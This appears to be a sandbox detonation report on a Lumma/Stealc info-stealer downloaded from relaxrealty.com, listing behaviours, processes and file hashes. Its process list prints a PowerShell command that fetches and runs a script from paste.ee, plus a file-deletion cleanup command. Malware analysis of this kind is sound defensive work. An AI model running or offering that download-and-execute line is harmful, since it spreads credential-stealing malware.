Analysis Overview
Threat Level: Known bad
The file http://relaxrealty.com/download.php was found to be: Known bad.
Malicious Activity Summary
Lumma Stealer, LummaC
Stealc
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Indicator Removal: File Deletion
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in Program Files directory
Subvert Trust Controls: Mark-of-the-Web Bypass
System Location Discovery: System Language Discovery
Checks processor information in registry
NTFS ADS
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-15 19:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-15 19:14
Reported
2024-10-15 19:20
Platform
win10v2004-20241007-en
Max time kernel
366s
Max time network
304s
Command Line
Signatures
Lumma Stealer, LummaC
Stealc
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
| N/A | N/A | C:\Program Files\LDPW\1.exe | N/A |
| N/A | N/A | C:\Program Files\LDPW\2.exe | N/A |
| N/A | N/A | C:\Program Files\LDPW\3.exe | N/A |
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3552 set thread context of 4300 | N/A | C:\Program Files\LDPW\1.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2604 set thread context of 4680 | N/A | C:\Program Files\LDPW\2.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2340 set thread context of 3356 | N/A | C:\Program Files\LDPW\3.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\LDPW\1.exe | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
| File created | C:\Program Files\LDPW\2.exe | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
| File created | C:\Program Files\LDPW\3.exe | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Installation_x64.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\LDPW\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\whoami.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\LDPW\2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\LDPW\3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Installation_x64.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Installation_x64.exe | N/A |
| N/A | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://relaxrealty.com/download.php"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://relaxrealty.com/download.php
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fbb3ee1-ac94-4752-a103-9a98674122d9} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 2320 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ce8d57d-8d2d-45e0-b70c-a7f6a8cb6711} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2996 -childID 1 -isForBrowser -prefsHandle 2988 -prefMapHandle 2984 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {27491e52-7cd0-4334-9324-bfcef4ec62d6} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3912 -childID 2 -isForBrowser -prefsHandle 3904 -prefMapHandle 3900 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e03fc959-d716-43fe-bd97-c859f65141a4} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4720 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4712 -prefMapHandle 4704 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e6d5370-193e-442d-947e-a538efabc24f} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5432 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a15102dc-2d22-4e45-83f8-05cdcd42f329} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5416 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1d08f2a-697c-4a98-b75b-b14f6742e415} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 5 -isForBrowser -prefsHandle 5856 -prefMapHandle 5852 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 952 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8ecb176-663f-45c7-b5ef-6b9d8e5142d0} 2356 "\\.\pipe\gecko-crash-server-pipe.2356" tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\Installation_x64.exe
"C:\Users\Admin\Downloads\Installation_x64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe"
C:\Program Files\LDPW\1.exe
"C:\Program Files\LDPW\1.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files\LDPW\2.exe
"C:\Program Files\LDPW\2.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Program Files\LDPW\3.exe
"C:\Program Files\LDPW\3.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups /fo csv
Network
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\4defcc7e-0668-41d8-9807-bce8a6e82aeb
| MD5 | d0a9271e19ba4d0f6c6ef3fc6b2f0e37 |
| SHA1 | 7b6a7d09d81b9d3ddbf2a883f648233682bfd345 |
| SHA256 | 38f3164bb28da1de874c2bcd3dad44a859db856eed99b3e767b19f840a0b99f2 |
| SHA512 | 03d0281f264cbecd0042b572e7be418d7dcf875d738eb850e60ceaee96918f44b18e3004ee4584e9abb22ee33ecbad940b294b0e3943ecd409ac51c63526249b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\6a259bb3-a633-4bfd-99e2-0e61fbaada98
| MD5 | 88501986f113103884c371a1b68730b9 |
| SHA1 | 44c17f70d398c58aa9a28254e2a2f5df923bce6b |
| SHA256 | bfab2f3893fc3d0882d85dd329cd102c9d6dbf37ce365617505d96c4c7a58b94 |
| SHA512 | 35a439add4b636b73cbc23fb236e93ac737e8814564ca2d21b47c267509604e7bdb7b9ab4f582cbb597a2b9744029a465c2cd83385648093239e9f877d254ee2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\172c7592-abeb-4f01-b0d0-bb1d89543020
| MD5 | 10e81d82125136a41428489764c37d41 |
| SHA1 | 152427e864464ea9ca9a70c14b2e47d2ac1e62df |
| SHA256 | 2b2865ee617cf7d3eea43894ec9052e35ee262a954a8e307103d8687e3b02edd |
| SHA512 | 83f24d180d7f219aa5c420b40abd1cce3e6e3174867cc059e4635c96b537cea7ed73095bc7639b89ccb491a357b717a1ec88a409eaa038f7d70b592cf5482c28 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | fa86d3127b05fa5b4cfa5c1620244020 |
| SHA1 | 326bcaeedb610b86cffdcbae2d4d7990b922d621 |
| SHA256 | a1802991b20be3028cf54b14b4bcf0bb66e4b2e6801c27a154c385bd9364b237 |
| SHA512 | 2f84a4f9e97faed3a03ec91d39b91a301fbcd4da830bbb175d52c3f6ce4cc1d0ef8fc2da99eba662e1609b5950e35dc104a14123aecdccec47dbcb97c5797e99 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json
| MD5 | 6803de8259cf8a7dd911ab86170e8978 |
| SHA1 | 6918ee30f59e745b57cff995c8b88cb68426efc6 |
| SHA256 | e10592ce35a232ce83a29995687b782dc4df6147daf676f5d4db136dc7c9690e |
| SHA512 | 407d9bfe6d5b64ca1227062cd3519176b7cb175279e2a8b10a1a22c4597864bc1ef52c2611a7bbf8b97d2491c02bd82a416f816cbcb9252f4ceeaa3a781891f6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | 642da0358f4719ee4b4790c05d4a7cc5 |
| SHA1 | a2dac4cab10b74eae44107f6c519993b9dc780b9 |
| SHA256 | 61241dc71f65638429da6afaf9fbb15d530aaa860bf9bd4f1b7492c465cbe074 |
| SHA512 | adb5994094e459b427e0896dfb42e755ff609404d1642052f5d489858cd1fdbb574bd78897feb97af58ae7098cda8c55bc3fe30f120f7dae9abddeb3a7e39d2d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | 666fcc5290d4be92abefa4cdaee078ee |
| SHA1 | 58c0c51a405a3d6ec7e3d09c56a72f5a5440bd5c |
| SHA256 | 71cc51c2157168ea4a5f41b7ce2b07bb0ba562288ab5093d85e4bf61ae0be7d0 |
| SHA512 | a6437382c960c2e6f306e08fb0454a3fdc17954d84e9fe346d8f25f993a10a8f0ea550fe47a34696d6f9b0a66e9c4a0a6d7300cd9d174912dd4cce6375c2293d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 13e5d7ceb89a4097ae35f82e0580cd88 |
| SHA1 | 954b26c46496bfdd7126c259612f50326bd462f6 |
| SHA256 | 2397e0bf9b68709d0cd4e119ce588c23727d358331ab78b665342a2a93477a5f |
| SHA512 | e88acd7a359fd1e2ba4d203cc817c1304859039b774d06632ae1cc4696a7b3119f7587decd9b56f972c778ee8c4696802f54aaf8790d67a54057517b3d676e95 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | 574c4ed762e00d262e2578cdd179f284 |
| SHA1 | c1acdc51ed8210ffdf4d6b468bc074abb58ecfee |
| SHA256 | f531588be12be03484d3dcd22c8dfc2f02a4f74cd8da810664ba6daac16371cf |
| SHA512 | c559d3796d1e71caf28b58438087b9392514bdda59532afe9167aadaebad1fac8be908882b84afa2a245c0d3513fefd2681d9c1a9443b90aa2fbfbc1fbf4ec95 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\cache2\entries\0305BF7FE660AF5F32B4319E4C7EF7A7B70257A3
| MD5 | d169a409dd9a04692f89a73556eb1a6c |
| SHA1 | 26eb3390ec7c150bb8cfdc97dc48dd4e32f8178c |
| SHA256 | 808f2f6a632666e1d7ca6f07ee4788ab452966f63a81edf56e7bf37abe32b95a |
| SHA512 | 67affd6c921174649c757b5f2f84a959fd3097e98c8e10b6191c40c874af8b285505c228c91abf6cdb97a2b81fdb001c6766712bdf9d5704300f894e36279f18 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
| MD5 | 842039753bf41fa5e11b3a1383061a87 |
| SHA1 | 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153 |
| SHA256 | d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c |
| SHA512 | d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | f0299633956e78949e0971a5336d9da6 |
| SHA1 | 71c0a2f22190c4cfbdd20f42da1e7d71f31c61ec |
| SHA256 | 3a3ba1ad0da9cd232cd0900a98bc6e0851984f2261615386b224502be8f6822e |
| SHA512 | 3314698ad1eaa0ec4bc32e59f6bad0e4c35710096e5fce625cd0e8eaf54ad53c191ea02161374a78035e0f5fca164980e9e6506dd340346a1368f680968dd109 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\AlternateServices.bin
| MD5 | 9ddd2a01046cbab7f7b6a6a4f388a756 |
| SHA1 | 5e35d6175d99329b2b5a140f2a74ce13e6e92da4 |
| SHA256 | 38c38fa3d47172a2e88f02c2a49c80b9f559132d1cc7a95f6ed24cbd28e856b4 |
| SHA512 | ed62b9279c6467f1b5543b7e018ab24b931ba6afc638674616f877cba3c411eb55c75f54a8d95d7933f2fe8b0ef9389fa5efaddb965a48daf572f2f931db5abe |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 7ed81394f2a2b737d7d177827dc52937 |
| SHA1 | 1b19ade845aa51735c2e475de8311a519f84ba30 |
| SHA256 | f6aa29a70144f6eae0116914f8add4fff06c097ce8445fc29fbc441c7066897d |
| SHA512 | 03268eccef510ff74ca051d91d7d918e0ec6848530f689e6f3c368ca3deb662ebc9baed22848a5c3f83e6a9561aca9151272343982bd4ec6a3b0435b64eeadd3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 5b55c7f704ae21d743c3e4ac4fc5fa68 |
| SHA1 | ae6b1d83c5814cf742140a68363359eb58186d57 |
| SHA256 | 9d79ad3ff37b6c081d369ca2756e778b36104d7f4258ad6f99940b94ee584611 |
| SHA512 | 0c730a9311f6c2fec45ca28479800ac264f8fb6a8d7c0f1a8ade2ceca788d2e9064b73f130faee963d445f044fce71c0f795e3e7d8fb649b6f13242a8ebba2de |
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
| MD5 | 0a8747a2ac9ac08ae9508f36c6d75692 |
| SHA1 | b287a96fd6cc12433adb42193dfe06111c38eaf0 |
| SHA256 | 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03 |
| SHA512 | 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
| MD5 | bf957ad58b55f64219ab3f793e374316 |
| SHA1 | a11adc9d7f2c28e04d9b35e23b7616d0527118a1 |
| SHA256 | bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda |
| SHA512 | 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
| MD5 | daf7ef3acccab478aaa7d6dc1c60f865 |
| SHA1 | f8246162b97ce4a945feced27b6ea114366ff2ad |
| SHA256 | bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e |
| SHA512 | 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\hostfxr.dll
| MD5 | 307b6f5832c5b80c8bc87d97b67e4775 |
| SHA1 | 9ab2916ae987ebf0131bab10e449933f3fadcfc0 |
| SHA256 | 7652aeb0ecb06119b0871f6b850193d3ffae73e22bf207c81b67b155afa85991 |
| SHA512 | cec6e1b2c278b287fc05767a7c596b8f1d180d24ca5be0d4ed484ca8e82487bcc804245e6c60e45852ba7964a3b288f42504c792a617f5200b461089d7a9219b |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\hostpolicy.dll
| MD5 | 314f06e61af6221c9b4b0af77e1af522 |
| SHA1 | 73b811d6488ab3dbb7edf9cf7d3daa0ce2343585 |
| SHA256 | ee653d530f0ba5bf0e7f691825dcbd2dc6995374820d7e4aef0604cc47c3b3ab |
| SHA512 | b05785222438da0f1b0a30ed77d3977c8a96fda00cfe8475816cbcc9b05176253d8a150d713ca99f58145d36ecce7ab643cfc15def39e1169a122dcc2cbd863b |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\coreclr.dll
| MD5 | a2820e527c4b99c4c649df4e54d4f38d |
| SHA1 | a2bca67626d532a3b1a96c5d913958470faa4727 |
| SHA256 | 100a032cbeb299c8d7cfe02fb39ca59c8d17fbbe276ed1da577c0eb6444b1a51 |
| SHA512 | a0942fbe93394d0978cf5f9747fdff4db90faa88b264dc56ae79d50fc0fc17b2701a211a46fff86d579465273156fb278f49a89e5abd6c63fa7acccdd03a6627 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Private.CoreLib.dll
| MD5 | 3bef1d84ef1785381eff399adec681df |
| SHA1 | 6a933f1c9f8f5cecb0ffa9aa0d6b382854ed99ae |
| SHA256 | 43ccf83cf6dd08e2ba9159990a0b099493667c423de51b1db1191f05a748fe51 |
| SHA512 | 9f436e7eb201927663b93e691d781b44d2d34011215a2b4dbf7584e5d788528f7601a7e9e4bbf422734ab9792984a44eed2bf5d9298940eb37420bfdef2066c2 |
memory/1776-3133-0x00007FF8A8D76000-0x00007FF8A8D77000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Installation_x64.dll
| MD5 | 963e14be9b45b9f44763de5caa628503 |
| SHA1 | 1bed67492024523e3974bf1bac98323ecd982986 |
| SHA256 | 9053c83a9b1e0b3da1c7d9620490d855124d2878e72cb54648dde00ef6377105 |
| SHA512 | 89815cc3f7c32e85b1cf513ef0863fefe0a1151b4d135616aa1a773f87aeb633b489f0fe150ee39750dd64ab8be800a2b8a1c5b0bfcae29d7e7ce14083ae44f0 |
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\clrjit.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Xaml.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Private.Uri.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Linq.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.Thread.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationNative_cor3.dll
C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Xml.ReaderWriter.dll
